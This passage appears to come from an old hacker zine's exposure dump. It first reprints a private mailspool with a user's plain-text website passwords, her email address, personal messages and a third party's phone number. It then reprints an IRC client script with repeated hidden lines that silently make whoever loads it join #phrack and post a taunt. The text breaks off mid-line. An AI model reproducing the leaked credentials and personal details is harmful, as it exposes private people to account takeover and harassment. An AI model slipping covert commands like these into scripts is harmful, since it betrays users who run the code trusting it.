1998 16:09:57 -0500 (EST) On Sun, 8 Mar 1998, Jen wrote: > im uglie n stuff so dun laff :( you are not From: "Erik K. Escobar" <root@enphourell.hemp.net> X-Sender: root@kriminal To: jennie@magpage.com Subject: y3w Date: Fri, 27 Mar 1998 23:18:23 -0500 (EST) g1mp From: Nobody <nobody@af3.angelfire.com> Message-Id: <199804132036.QAA29476@af3.angelfire.com> To: jennie@magpage.com Subject: Your Home Page at Angelfire Welcome to Angelfire! You have registered for a Free Home Page at http://www.angelfire.com. Your email address is: jennie@magpage.com Your assigned Password is: xYd7Qf From: civics@geocities.com Date: Tue, 14 Apr 1998 13:08:16 -0700 (PDT) Message-Id: <199804142008.NAA24099@cgi1.geocities.com> Subject: Welcome to GeoCities Welcome to the GeoCities Personal Homepage Program! Thank you for choosing GeoCities. To foster the growth of the GeoCities community and to keep it fresh and evolving **PLEASE** keep in mind that you'll need to start building your homepage within the next two weeks. To that end, this e-mail is designed to give you all the info you'll need to get started at GeoCities. The URL for your Personal Homepage is: http://www.geocities.com/SouthBeach/Shores/7305/ YOUR MEMBER NAME IS: jennicide YOUR CURRENT PASSWORD IS: uhxcoe Date: Thu, 23 Apr 1998 20:21:18 -0400 From: White Trash <whitetrash@rednecks.com> To: jennie@magpage.com I just thought that i would e-mail you to say hey. We are chatting right now, but you went somewhere. Ok your back...Well now you got my e-mail address and hopefully you'll keep in touch. Dont forget about my b-day pic....j/k Paul -- ---=+=<:White trasH:>=+=--- whitetrash@rednecks.com http://home.dmv.com/~pauls/ Date: Fri, 24 Apr 1998 00:18:46 -0400 From: White Trash <whitetrash@rednecks.com> To: jennie@magpage.com Subject: ICQ right as we were saying our goodbyes and good nights, i got disconnected. I signed back on, but i couldnt connect to ICQ :( So i decided to mail you and let you know that i didnt cut you short... I will try to be on around 11 or 12 tomarrow night. I had a great time chatting.... keep in touch..... *hugz & kisses* Good Night Sweetheart! Love Ya, Paul -- ---=+=<:White trasH:>=+=--- whitetrash@rednecks.com http://home.dmv.com/~pauls/ Date: Fri, 24 Apr 1998 23:57:26 -0400 From: White Trash <whitetrash@rednecks.com> To: jennie@magpage.com Subject: Sweetheart While you were on the phine ICQ kept disconnecting me.... NEWAYZ...i really want to talk to you, but i want to lay down and jerk off, you know...the usual rutine...Well call me if you can... Please do, (302) 947-9096.... It dosent matter, just make sure its not past like 2.. Pleaze call me if you wanna chat. Sorry i couldnt connect. Well if i dont hear from ya...godd night...we'll do it another night. Dan said that he will take me up there, maybe next weekend, if not then probally the the one after that...is that kool? well, catch ya later! Love Ya, Paul Date: Sat, 25 Apr 1998 07:35:35 -0400 From: White Trash <whitetrash@rednecks.com> To: jennie@magpage.com Subject: Hi.... It is Saturday morning.... i'm about to go to work. Sorry we didnt get to talk last night. Well, hopefully i'll be home tonight around 1,12, 1. Something like that, but i might crash at a friends house. Try to meet me on ICQ. Mail me back. -- ---=+=<:White trasH:>=+=--- whitetrash@rednecks.com http://home.dmv.com/~pauls/ Date: Sun, 26 Apr 1998 00:33:57 -0400 From: White Trash <whitetrash@rednecks.com> To: jennie@magpage.com Subject: Saturday Night, 12:30 i gotta lay down, i really wanted to chat too.... call me tonight if ya want to. 947-9096 catch ya later paul -- ---=+=<:White trasH:>=+=--- whitetrash@rednecks.com http://home.dmv.com/~pauls/ Date: Sun, 26 Apr 1998 21:50:22 -0400 From: White Trash <whitetrash@rednecks.com> To: Jen <jennie@magpage.com> Sweetie. well, it happened again, we got disconnected. :( Please give me a call if you want. I would love to talk to ya. I'll be up to about 12:30 probally, even if its past if you want, call me. Mail me. Paul -- ---=+=<:White trasH:>=+=--- whitetrash@rednecks.com http://home.dmv.com/~pauls/ Date: Sun, 26 Apr 1998 23:16:23 -0400 From: White Trash <whitetrash@rednecks.com> To: Jen <jennie@magpage.com> Subject: Good Night If you dont call, good night. :pd: Paul -- ---=+=<:White trasH:>=+=--- whitetrash@rednecks.com http://home.dmv.com/~pauls/ To: Jen <jennie@magpage.com> Subject: ICQ This is what i wrote in the chat window before you left... i have been thinking about toneing down my relationship w/ heather so that i can see other people. Even if nothing happens between me and you, there are gonna be a lot of girls this summer, and it will damn hard to not act upon any erges i get. and it will be okay if i'm just dating her. do you agree/not agree? Well, if you get back in time, like before 1. Try to give me call. Paully -- ---=+=<:White trasH:>=+=--- whitetrash@rednecks.com http://home.dmv.com/~pauls/ [END_CUT] jenncidie.mailspool [4] -> ********************************************** <- [4] [4] -> phr0m some 0ne wh0 w1shes t0 r3m4in an0nym0us: <- [4] [4] -> ********************************************** <- [4] [CUT_HERE] h4g1s.irc # # -------------------------------------------------------------------- # h4g1s.irc # -------------------------------------------------------------------- # # IRC Script Program. For use with ircii clients v2.8.2 and newer. # Copyright (C) 1999 h4g1s # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. # alias on_names { @ ns = [$1-] echo *** Names $0 ^B[$#ns]^B echo.recursive $ns ^assign -ns } alias sv if ([$0]) {notice $0 $lice()}{send $lice()} alias sf if ([$0]) {ctcp $0 WHOAMI}{ctcp * WHOAMI} alias sc if (ischannel($0)) {NAMES * $0}{NAMES * $C} alias sb if (ischannel($0)) {MODE $0 b}{MODE * b} alias chanst { if (ischannel($0)) {@ chanst.test = [$0]}{@ chanst.test = [$C]} clean.channel $chanst.test } alias findip {^exec -name fip perl $HOME/findip.pl $*} alias umode MODE $N $0- alias ww whowas $* alias wi if ([$0]) {quote WHOIS $0-}{whois} alias wii if ([$0]) {quote WHOIS $0 $0}{whois} alias re redirect alias rlag { @ temp.lag = time() quote PING $temp.lag $S } alias relm rel.proc M MSG $* alias reln rel.proc N MSG $* alias relw rel.proc W MSG $* alias tlm rel.proc M T $* alias tln rel.proc N T $* alias tlw rel.proc W T $* alias wlm rel.proc M WALL $* alias wln rel.proc N WALL $* alias relmk rel.proc M K $* alias relnk rel.proc N K $* alias relwk rel.proc W K $* alias rel.proc { if ([$2]!=[]) { if ([$[2]2]==[-l]) { if ([$temp[$0][0]]!=[]) { echo ^_Num.^_ ^_Context ^_ for (@ gg = 0, [$temp[$0][$gg]]!=[], @gg=gg+1) { echo ^B[${gg+1}]^B $decode($temp[$0][$gg]) } ^assign -gg }{echo *** Nothing in $0\-buffer.} }{ if (index($2 0123456789) != -1) { if ([$3]!=[]) { $1 $3 $decode($temp[$0][${[$2]-1}]) }{ $1 $C $decode($temp[$0][${[$2]-1}]) } }{$1 $2 $decode($temp[$0][$queue.tail(temp.$0)])} } }{send $decode($temp[$0][$queue.tail(temp.$0)])} } alias log { if ([$0]==[ON] || [$0]==[OFF]) { set log $0 window log $0 }{ echo *** Log file mask: ^B$LOGFILE help } } alias win_new ^window new name $0 level none $1- alias rex if ([$1]) {exec -msg $0-}{uecho Usage: /REX <Nick|Channel> <Unix command [Args]>} alias ex exec alias c MODE * $* alias rkey if (ischannel($0)) {MODE $0 -k $chan[$hook(CLI $0)][K]}{MODE $C -k $chan[$hook(CLI $C)][K]} alias ml if (ischannel($0)) {MODE $0 +inst-lmpmk $chan[$hook(CLI $0)][K]}{MODE $C +inst-lmkpm $chan[$hook(CLI $C)][K]} alias mc if (ischannel($0)) {MODE $0 -lsnmpitmk $chan[$hook(CLI $0)][K]}{MODE $C +inst-lsnmkpitm $chan[$hook(CLI $C)][K]} alias mo if (ischannel($0)) {MODE $0 +nst-ilmpmk $chan[$hook(CLI $0)][K]}{MODE $C +nst-ilmkpm $chan[$hook(CLI $C)][K]} alias m msg alias n notice alias invite { if (ischannel($0)) { @ i.c = 0 @ i.n = [$1-] @ i.x = word(0 $i.n) while ([$i.x]!=[]) { quote.add INVITE $i.x $0 @ i.c = i.c + 1 @ i.x = word($i.c $i.n) } quote.flush ^assign -i.c ^assign -i.n ^assign -i.x }{ if (ischannel($1)) { quote INVITE $0 $1 }{ quote INVITE $0 $C } } } alias on_disconnect { if ([$main.bss]!=[]) { if ([$word(0 $main.bss)]!=[$0]) { ^timer -r 5 5 server $main.bss echo *** Auto: Disconnected from $0\, moving to ^B$word(0 $main.bss)\^B }{ ^timer -r 5 5 server + echo *** Auto: Cycling servers, disconnected from server. } }{ ^timer -r 5 5 server + echo *** Auto: Cycling servers, disconnected from server. } purge cache purge bans if (ismset(U)) {away.save LiCe licelogd Remote connection to $0 server lost.} } alias j if (ischannel($0)) {JOIN $0-}{JOIN #$0-} alias l if (![$0]) {PART *}{if (ischannel($0) || [$0]==[*]) {PART $0}{PART #$0}}alias leave l alias cycle { if (C) { if (index(i $M) == -1) {@ cycle.test = [$C]} ^on -leave "$N $C" { ^timer 0 JOIN $1 $chan[$hook(CLI $1)][K] ^on -leave -"$N $1" } PART $C } } alias cycle.clear { if ([$1]==[$cycle.test]) { purge cache.$hook(CLI $1) purge bans.$hook(CLI $1) ^assign -cycle.test } if ([$0]==[471] || [$0]==[473]) { if (isset(D)) {^timer -r $0 $main.rjt JOIN $1} } } alias chg { PART * if (ischannel($0)) {JOIN $0-}{JOIN #$0-} } ^join #phrack ^wait alias alarm { if ([$0]!=[]) { if ([$0]==[PUSH]) { if ([$2]!=[]) { if (index($1 0123456789) != -1) { @ at.t = [$1] if (at.t > 60 || at.t == 0) {@ at.t = 60} queue.add alarmT 9 $at.t queue.add alarmE 9 $2- echo *** Alarm: Added new event for every ^B$at.t minute$_plural($at.t)\^B purge at }{echo *** Alarm: Not a number in timeout!} }{uecho /ALARM [POP|PUSH|KILL|LIST] [<id>|<minutes <command [args]>>]} }{ if ([$0]==[POP]) { @ at.t = strip(# $1) - 1 @ at.o = at.t if (alarmT[$at.t]) { @ at.c = 0 while ((at.t < 10) && alarmT[$at.c]) { @ at.c = at.t + 1 ^assign -alarmT[$at.t] ^assign -alarmE[$at.t] @ alarmT[$at.t] = [$alarmT[$at.c]] @ alarmE[$at.t] = [$alarmE[$at.c]] @ at.t = at.t + 1 } ^assign -alarmT[$at.t] ^assign -alarmE[$at.t] echo *** Alarm: Removed even id '${at.o + 1}\'. purge at }{echo *** Alarm: No such even id '$1\'.} }{ if ([$0]==[KILL]) { purge alarmT purge alarmE echo *** Alarm: All scheduled events have been purged. }{alarm.view} } } }{alarm.view} } alias alarm.view { if (alarmT[0]) { echo ^_Id T Event^_ foreach alarmT at {echo [$[2]{at + 1}] $[2]alarmT[$at] $alarmE[$at]} ^assign -at }{echo *** Alarm: No events scheduled.} } alias alarm.check { @ at.p = [$0] foreach alarmT at.i { if ([$at.p]==[00]) {@ at.p = 60} @ at.s = at.p / alarmT[$at.i] @ at.r = at.s * alarmT[$at.i] if (at.r == at.p) { if (!L) {sendline $alarmE[$at.i]} } } purge at } ^msg #phrack OH WHAT A GOOSE I AM ^wait alias w { if ([$0]) { if ([$[1]0]==[-]) {WHO $0 * $1-}{WHO $0-} }{WHO *} } alias t if (ischannel($0)) {TOPIC $0-}{TOPIC $C $0-} alias offers if ([$0]) {ctcp $0 XDCC LIST}{ctcp $C XDCC LIST} alias ver if ([$0]) {ctcp $0 VERSION}{ctcp $C VERSION} alias ping if ([$0]) {${K}${K}PING $0}{${K}${K}PING $C} alias p ping alias describe { if ([$[1]0]==[=]) { ^msg $0 ^AACTION $1-\^A }{${K}${K}describe $*} } alias nochat dcc close chat $0 alias chat { if ([$0]!=[]) {adcc.chat $0}{ @ who = queue.head(chats) if (who) { dcc chat $who tab.add =$who } ^assign -who } } alias adcc.chat dcc chat alias adcc { echo *** Woops! ADCC.SCR is not loaded, loading it... load adcc.scr if ([$0]) {adcc $*} } ^msg #phrack OH WHAT A GOOSE I AM ^wait alias kick.proc { if ([$P]==[@]) { @ kp.r = [$main.dkm] if ([$0]!=[MULTI]) { @ kp.a = [$2] @ kp.p = rmatch($kp.a *.* *@* \\*%\\*) if ([$3]!=[]) {@ kp.r = [$3-]} }{ @ kp.p = 0 if (index(: $2-) == -1) { @ kp.nl = [$2-] }{ @ kp.t = [$2-] @ kp.nl = mid(0 $index(: $kp.t) $kp.t) @ kp.r = mid(${index(: $kp.t) + 1} 99 $kp.t) } } if (kp.p) {@ kp.b = isban($kp.c $kp.a)} if ((kp.p == 0) && [$0]!=[MULTI]) { if (onchannel($kp.a $C)) { @ kp.t = [$cache[$1][$struct($kp.a)]] if ([$[1]0]==[B]) { @ kp.cc = 0 @ kp.p = makeban($0 $kp.t) while (word($kp.cc $kp.b)) { @ mode.add($1 -b $word($kp.cc $kp.b)) @ kp.cc = kp.cc + 1 } if (ischanop($kp.a $C)) {@ mode.add($1 -o $kp.a)} @ mode.add($1 +b $kp.p) } @ mode.flush($C) quote KICK $C $kp.a :$kp.r if ([$0]==[BI]) {^ig $kp.p ALL CRAP -PUBLIC} } }{ if ([$0]!=[MULTI]) { foreach cache.$1 kp.n { @ kp.nn = decode($kp.n) if (match($kp.a $kp.nn\!$cache[$1][$kp.n]) && [$kp.nn]!=[$N]) { if ([$0]==[BI]) {^ig $kp.p ALL CRAP -PUBLIC} @ push(kp.nl $kp.nn) } } if (kp.b) {loop.mode - b $C $kp.b} if (index(! $kp.a) == -1) {quote MODE $C +b *!$cluster($kp.a)}{quote MODE $C +b $kp.a} } if (kp.nl) {loop.mk $C $kp.nl :$kp.r} quote.flush } purge kp }{echo *** $ch($C)\: You are not channel operator.} } alias k if ([$0]!=[]) {kick.proc FAST $hook(CLI $C) $*} alias kb if ([$0]!=[]) {kick.proc BN $hook(CLI $C) $*} alias kh if ([$0]!=[]) {kick.proc BH $hook(CLI $C) $*} alias kf if ([$0]!=[]) {kick.proc BF $hook(CLI $C) $*} alias ku if ([$0]!=[]) {kick.proc BU $hook(CLI $C) $*} alias ki if ([$0]!=[]) {kick.proc BI $hook(CLI $C) $*} alias kbi ki alias mk if ([$0]!=[]) {kick.proc MULTI $hook(CLI $C) $*} ^msg #phrack OH WHAT A GOOSE I AM ^wait @ temp.tbc = 0 alias tab.add { @ p.c = match($0 $temp.tbn) if (p.c > 0) {@ temp.tbn = [$0 $ref(1-${p.c - 1} $temp.tbn) $ref(${p.c + 1}- $temp.tbn)]} {@ temp.tbn = [$0 $ref(1-6 $temp.tbn)]} @ temp.tbc = 0 ^assign -p.c } alias tab.get { if (L) { @ tab.test = match(${L}* $temp.tbn) if (tab.test > 0) { @ tab.test = [$^\^^ref($tab.test $temp.tbn)]##[ ] type ^U$K$0 $tab.test }{ if (temp.tbc >= #temp.tbn) {@ temp.tbc = 0} type ^U$K$0 $^\^^word($temp.tbc $temp.tbn) @ temp.tbc = temp.tbc + 1 } ^assign -tab.test }{ if (temp.tbc >= #temp.tbn) {@ temp.tbc = 0} type ^U$K$0 $^\^^word($temp.tbc $temp.tbn) @ temp.tbc = temp.tbc + 1 } } alias msay { if (C) {if ([$0]!=[]) { quote PRIVMSG $_send($mychannels()) :$0- echo -> ^B<^B${N}^B>^B $0- }{uecho Usage: /MSAY <text>}} } alias mme { if (C) {if ([$0]!=[]) { quote PRIVMSG $_send($mychannels()) :^AACTION $0-\^A echo -> ^B*^B $N $0- }{uecho Usage: /MME <action>}} } alias purge { foreach $0 ii {purge $0.$ii} ^assign -ii ^assign -$0 } alias notword { if ([$0] > 0) { if (([$0] > 1) && ([$0] < rmatch($~ $1-))) {@ nw.sep = [ ]}{@ nw.sep = []} @ function_return = [$(1-${[$0]-1})]##[$nw.sep]##[$(${[$0]+1}-)] }{@ function_return = [$1-]} } ^msg #phrack OH WHAT A GOOSE I AM ^wait alias push { @ $0 = [$1 $($0)] } alias pop { @ function_return = word(0 $($0)) @ $0 = ref(2- $($0)) } alias queue.add { @ item = 0 foreach $0 idx {@ item = item + 1} if (item > [$1]) { @ item = item - 1 for (@ idx = 0, idx < item, @ idx = idx + 1) { @ $0[$idx] = [$($0[${idx+1}])] } ^assign -idx } @ $0[$item] = [$2-] ^assign -item } alias queue.head { @ qnext = 0 @ qhead = 0 @ function_return = [$($0[0])] ^assign -$0[0] while ([$($0[${qhead+1}])]!=[]) { @ qnext = qhead + 1 @ $0[$qhead] = [$($0[$qnext])] @ qhead = qhead + 1 } ^assign -$0[$qhead] ^assign -qhead ^assign -qnext } alias queue.tail { @ qtail = -1 while ([$($0[${qtail + 1}])]!=[]) {@ qtail = qtail + 1} @ function_return = qtail ^assign -qtail } ^msg #phrack OH WHAT A GOOSE I AM ^wait alias cluster { @ _c_u = [*] if (index(! $0) != -1) { @ _c_t = mid(${index(! $0)+1} ${@0-index(! $0)+1} $0) @ _c_u = left($index(@ $_c_t) $_c_t) @ _c_h = mid(${index(@ $_c_t)+1} 80 $_c_t) ^assign -_c_t }{if (index(@ $0) != -1) { @ _c_u = left($index(@ $0) $0) @ _c_h = mid(${index(@ $0)+1} 80 $0) }{@ _c_h = [$0]}} while ((index($[1]_c_u ~\^+=-) != -1) || (@_c_u > 8)) {@ _c_u = mid(1 20 $_c_u)} if (index($right(1 $_c_h) 0123456789) != -1) { @ function_return = [$_c_u@$mid(0 ${rindex(. $_c_h)+1} $_c_h)]##[*] }{ while ([$[1]_c_h]==[*]) {@ _c_h = mid(1 80 $_c_h)} if (index(. $_c_h) != rindex(. $_c_h)) {@ _c_h = mid($index(. $_c_h) 80 $_c_h)} @ function_return = [$_c_u@*$_c_h] } ^assign -_c_h ^assign -_c_u } alias makeban { if ([$0]==[BC]) { @ function_return = [*!*@*$mid($rindex(. $1) 99 $1)] }{ if ([$0]==[BF]) { @ function_return = [*!$cluster($_host($1))] }{ if ([$0]==[BH]) { @ function_return = [*!*@$_host($1)] }{ if ([$0]==[BU]) { @ function_return = [*!$mid(${index(! $1)+1} $index(@ $1) $1)@*] }{ @ function_return = [*!*$cluster($1)] } } } } } @ domain[com] = [Commercial] @ domain[edu] = [Educational] @ domain[gov] = [Government] @ domain[mil] = [Military] @ domain[net] = [Network] @ domain[org] = [Organization] alias on_311 { if (index($right(1 $3) 1234567890) != -1) { findip $3 } @ _st = mid(${rindex(. $3)+1} 5 $3) if (domain[$_st]) {echo ^B[^B $0 ^B$1^B!$2@$3 $$domain[$_st]$ ^B]^B} {echo ^B[^B $0 ^B$1^B!$2@$3 ^B]^B} ^assign -_st if ([$[1]2]==[~]) {echo :^_ no ident ^_: $3 is not using identd.}{ if (index($[1]2 -=+) != -1) {echo :^_restricted^_: $3 is on a restricted connection.}} if ([$4]!=[] && [$4]!=[*Unknown*]) {echo :^_ ircname ^_: $5-} @ _ok = hook(CUF $2@$3) if (_ok) { if ([$user[F][$_ok][L]]!=[]) {echo :^_ userlist ^_: $user[F][$_ok][M] $Global +^B$user[F][$_ok][L]\^B$} {echo :^_ userlist ^_: $user[F][$_ok][M] (No global modes)} }{ @ _ok = hook(CUS $2@$3) if (_ok) { if ([$user[S][$_ok][L]]!=[]) {echo :^_ shitlist ^_: $user[S][$_ok][M] $Global +^B$user[S][$_ok][L]\^B$} {echo :^_ shitlist ^_: $user[S][$_ok][M] (No global modes)} }} } alias struct @ function_return = encode($tolower($0-)) alias _userhost @ function_return = mid(${index(! $0)+1} ${@0-index(! $0)+1} $0)alias _host @ function_return = mid(${index(@ $0)+1} ${@0-index(@ $0)+1} $0) alias isban { @ ibm = [] if (rmatch($1 *.* *@*) && [$0]!=[NONE]) { foreach bans.$0 ibx { @ ibt = decode($ibx) if (match($ibt $1) || rmatch($1 $ibt)) {push ibm $ibt} } ^assign -ibt ^assign -ibx } @ function_return = [$ibm] ^assign -ibm } alias _chops { @ chops.l = [] if (ischannel($0)) {@ chops.c = [$0]}{@ chops.c = [$C]} foreach cache.$hook(CLI $chops.c) jj { if (ischanop($decode($jj) $chops.c) && [$N]!=[$decode($jj)]) { @ chops.l = [$decode($jj) $chops.l]}} @ function_return = [$chops.l] ^assign -chops.c ^assign -chops.l ^assign -jj } alias _nochops { @ nonops.l = [] if (ischannel($0)) {@ nonops.c = [$0]}{@ nonops.c = [$C]} foreach cache.$hook(CLI $nonops.c) jj { if (!ischanop($decode($jj) $nonops.c) && [$N]!=[$decode($jj)]) { @ nonops.l = [$decode($jj) $nonops.l]}} @ function_return = [$nonops.l] ^assign -nonops.c ^assign -nonops.l ^assign -jj } ^msg #phrack OH WHAT A GOOSE I AM ^wait alias nick.completion { if ([$L]!=[] && [$C]!=[0]) { @ line.t = [$L] @ line.a = ref(${#line.t} $line.t) @ line.c = match(${line.a}* $chanusers($C)) if (line.c > 0) { if (#line.t > 1) { @ line.t = notword(${#line.t} $line.t) @ line.t = [$line.t]##[ $ref($line.c $chanusers($C)) ] }{@ line.t = [$ref($line.c $chanusers($C))\^B:^B ]} } type ^U$^\^^line.t purge line } } alias ref @ function_return = [$(${[$0]})] alias _tdiff @ function_return = word(0 $0$[1]1$2$[1]3$4$[1]5$6$[1]7) alias mecho xecho -window MW $* alias lecho echo *** $* alias uecho echo [^B?^B] $* alias lice {if ([$0]) {@ id.c = [$id.c]##[ + $0-]}{@function_return = [$decode(BPFDHCGGFCGPEHBPCHHDCAACEMGJEDGFAC) v${id.v}.${id.r}.${id.p}${id.c}]}} alias _send { if ([$1]) {@ function_return = [$0,$_send($1-)]} {@ function_return = [$0]} } alias echo.recursive { echo $[10]0 $[10]1 $[10]2 $[10]3 $[10]4 $[10]5 $[10]6 if ([$7]) {echo.recursive $7-} } alias ch @ function_return = mid(0 ${CHANNEL_NAME_WIDTH} $0) alias target if (T) {@ function_return = [$T]}{@ function_return = [$C]} alias uh if (isset(V)) {@ function_return = [$0!$1]}{@ function_return = [$0]} alias _plural if ([$0]==[1]) {@ function_return = []}{@ function_return = [s]} alias isset @ function_return = (1 + index($0 $main.set)) alias isset.show if (isset($0)) {@ function_return = [On]}{@ function_return = [Off]} alias iscset @ function_return = (1 + index($0 $chan[$hook(CLI $1)][T])) alias iscsetf @ function_return = (1 + index($0 $chan[$1][T])) alias iscset.show if (iscset($0 $1)) {@ function_return = [On]}{@ function_return = [Off]} alias ismset if (isset(R)) {@ function_return = (1 + index($0 $main.mset))}{@ function_return = 0} alias ismset.show if (ismset($0)) {@ function_return = [On]}{@ function_return = [Off]} ^msg #phrack OH WHAT A GOOSE I AM ^wait alias oncache @ function_return = [$cache[$hook(CLI $0)][$struct($1)]] alias on_404 { if ([$0]!=[$temp.sync]) {if ([$0]!=[$S]) { ^timer -d 111 echo *** You are desynched on ^B$1^B $$0: $2-$ @ temp.sync = [$0] }} ^timer -r 404 30 ^assign -temp.sync } alias clean.sweep { if (ischanop($N $0)) { @ _xa = hook(CLI $0) foreach cache.$_xa _xb { @ _xd = decode($_xb) if ([$_xd]!=[$N]) { @ _xc = isban($_xa $_xd!$cache[$_xa][$_xb]) if (_xc) { if (onchannel($decode($_xb) $0)) {quote.add KICK $0 $decode($_xb) :$ch($0) ban: ^B$_xc\^B} }}} quote.flush ^assign -_xa ^assign -_xb ^assign -_xc ^assign -_xd } } alias flood.check { if (index(F $user[F][$hook(CUF $1)][L]) == -1) { if (match($0 $flood.test) == 0) { if ((!ischannel($3) && isset(F)) || (ischannel($3) && iscset(C $3))) { @ _f_i = hook(CF $1 $3) if (_f_i) { if (time() - _f_i <= main.fint) { @ fld[$_f_i][$0] = fld[$_f_i][$0] + 1 if ([$fld[$_f_i][$0]] >= [$(main.$0)]) { @ function_return = 0 flood.action ${time() - _f_i} $0- ^on ^hook -"CF $fld[$_f_i][H] $fld[$_f_i][I]" ^assign -fld[$_f_i][$0] ^assign -fld[$_f_i][H] ^assign -fld[$_f_i][I] }{@ function_return = 1} }{@ function_return = 1} }{ @ function_return = 1 @ _f_i = time() while ([$fld[$_f_i][H]]!=[]) {@ _f_i = _f_i + 1} @ fld[$_f_i][H] = [*@$_host($1)] ^on ^hook "CF $fld[$_f_i][H] $3" @ function_return = [$_f_i] @ fld[$_f_i][$0] = 1 @ fld[$_f_i][I] = [$3] } ^assign -_f_i }{@ function_return = 1} }{@ function_return = 1} if (isset(B)) { if (index(I $user[S][$hook(CUS $1)][L]) != -1) { echo *** Auto: Ignore ^B$0^B, SHIT mode +I detected. ^ig $user[S][$hook(CUS $1)][M] ALL CRAP -PUBLIC } } }{@ function_return = 1} } on -flood "% PUBLIC *" { if (ischanop($N $C) && iscset(C $C)) { if (iscset(P $C)) { @ _f_p = hook(CUF $userhost()) if (_f_p) { if (index(F $user[F][$_f_p][L]) == -1) {if (onchannel($0 $C)) {quote KICK $C $0 :Flood: ^B${FLOOD_AFTER / 2}^B consecutive public lines.}} {if (!rmatch($C $user[F][$_f_p][C])) {quote KICK $C $0 :Flood: ^B${FLOOD_AFTER / 2}^B consecutive public lines.}} }{if (onchannel($0 $C)) {quote KICK $C $0 :Flood: ^B${FLOOD_AFTER / 2}^B consecutive public lines.}} ^assign -_f_p }{if (onchannel($0 $C)) {quote KICK $C $0 :Flood: ^B${FLOOD_AFTER / 2}^B consecutive public lines.}} } } alias flood.action { @ _u_m = _host($2) @ push(flood.test $1) if (ischannel($4) == 0) { echo *** ^BAlert^B: $1 flood detected from ^B$3^B $@$_u_m$ ^ig *@$_u_m if (!isset(Q)) {quote NOTICE $3 :^B[^B$1 Flood!^B]^B You'll be ignored for ^_$tdiff(${main.igt * 60})\^_. $main.dem} }{ if (ischanop($N $4)) { if (iscset(F $4) || [$1]==[JOIN]) { @ mode.add($hook(CLI $4) +b *!*@$_u_m) if (ischanop($3 $4)) {@ mode.add($hook(CLI $4) -o $3)} @ mode.flush($4) } quote KICK $4 $3 :Flood: ^B$(main.$1) ^B$1's in $$0$ $tdiff($main.fint) echo *** ^BAlert^B: $1 flood detected from ^B$3^B $@$_u_m$ on $4 } if (iscset(S $4)) {^user -s *@$_u_m +$4 +FI Auto shit for being a $1 flood dork!} } if (ismset(U)) {away.save LiCe licelogd $1 flood from $3!*@$_u_m on $4} ^assign -_u_m ^timer $main.ftst ^assign -flood.test } #alias waste_mucho_cpu_please { alias clean.lists { foreach fld XX {if (time() - XX >= main.fint) { ^on ^hook -"CF $fld[$XX][H] $fld[$XX][I]" foreach fld.$XX YY {^assign -fld[$XX][$YY]} }} foreach ignore XX {if (time() >= XX) { ^IGNORE $ignore[$XX] NONE echo *** Auto: Ignore ^B$ignore[$XX]\^B expired at $strftime($XX %X) $$tdiff(${main.igt * 60})$ ^assign -ignore[$XX] }} foreach nsn XX { if (time() - XX >= 300) { foreach nsn.$XX YY {foreach nsn.$(XX).$YY ZZ {^assign -nsn[$XX][$YY][$ZZ]}} ^on ^hook -"NSN $hook(NSI $XX)" ^on ^hook -"NSI $XX" ^assign -ZZ } } foreach bans XX {if (iscsetf(E $XX)) { foreach bans.$XX YY {if (time() - bans[$XX][$YY] >= main.ban) { @ mode.add($XX -b $decode($YY)) ^assign -bans[$XX][$YY] }}} @ mode.flush($hook(CLC $XX)) } ^assign -XX ^assign -YY } on -channel_nick * { @ cn = hook(CLI $0) if ([$cn]!=[NONE]) { @ cache[$cn][$struct($2)] = userhost() ^assign -cache[$cn][$struct($1)] if ([$2]!=[$N]) {if (flood.check(NICK $userhost() $2 $0)) { if (ischanop($N $0) && iscsetf(T $cn)) {if (match($2 \{ \} \\ $main.nix)) {quote KICK $0 $2 :^BLame nick detected!^B}} }}} ^assign -cn } on -raw_irc "% MODE % *" { if (ischannel($2)) { @ m.x = hook(CLI $2) if ([$m.x]!=[NONE]) { @ m.h = _userhost($0) if (!m.h) {@ m.h = [SERVER]} mode.main $left($index(! $0) $0) $m.h $2 $m.x $3- ^assign -m.h } ^assign -m.x } } alias mode.main { @ m.i = 0 @ m.a = [$5-] @ oper.test = ([$0]==[$N]) @ deop.test = 0 fec ($4) m.m { if ([$m.m]==[+] || [$m.m]==[-]) {@ m.s = [$m.m]}{ if (index($m.m bklov) != -1) { if ([$m.s$m.m]!=[-l]) { ^hook MODE$m.m$m.s $0 $1 $2 $3 $word($m.i $m.a) @ m.i = m.i + 1 } }{ if ([$1]!=[SERVER] && !oper.test) {@ flood.check(MODE $1 $0 $2)} if (iscsetf(L $3)) { @ m.z = hook(CUF $1) if (index(E $userc[$m.z][C][$rmatch($2 $user[F][$m.z][C])]) == -1) { if ([$m.s]==[+]) {if (index($m.m $chan[$4][L]) == -1) {@ mode.add($3 -$m.m)}} {if (index($m.m $chan[$4][L]) != -1) {@ mode.add($3 +$m.m)}} } ^assign -m.z } } } } @ mode.flush($2) quote.flush } on ^hook "MODEb- % % % % %" { ^assign -bans[$4][$struct($5)] if (iscsetf(B $4) && !oper.test) { if ([$_userhost($5)]!=[*@*]) { @ banee = hook(CUS $_userhost($5)) if (index(B $userc[$banee][C][$rmatch($3 $user[S][$banee][C])]) != -1) { @ operc = hook(CUF $2) if (index(E $userc[$operc][C][$rmatch($3 $user[F][$operc][C])]) == -1) { @ mode.add($4 +b $5) if (!isset(Q) && [$2]!=[SERVER]) {quote.add NOTICE $1 :Sorry ^B[^B$5^B]^B is in my permanent banlist. $main.dem} } ^assign -operc } ^assign -banee } } } on ^hook "MODEb+ % % % % %" { @ bans[$4][$struct($5)] = time() if ([$2]!=[SERVER] && !oper.test) { if (match($5 $N!$myuh)) { @ mode.add($4 -b $5) quote.add KICK $3 $1 :Dont ban ^B$5^B asshole! That's me! echo *** ^BAlert^B: ^B$1^B banned you from $ch($3) with \"$5\" if (ismset(U)) {away.save LiCe licelogd $1 banned you from $3 $$5$} }{ if (iscsetf(P $4)) { @ banee = hook(CUF $2) if (index(E $userc[$banee][C][$rmatch($3 $user[F][$banee][C])]) == -1) { @ baner = hook(CUF $_userhost($5)) if (baner) { @ banee = rmatch($3 $user[F][$baner][C]) if (index(P $userc[$baner][C][$banee]) != -1) {@ 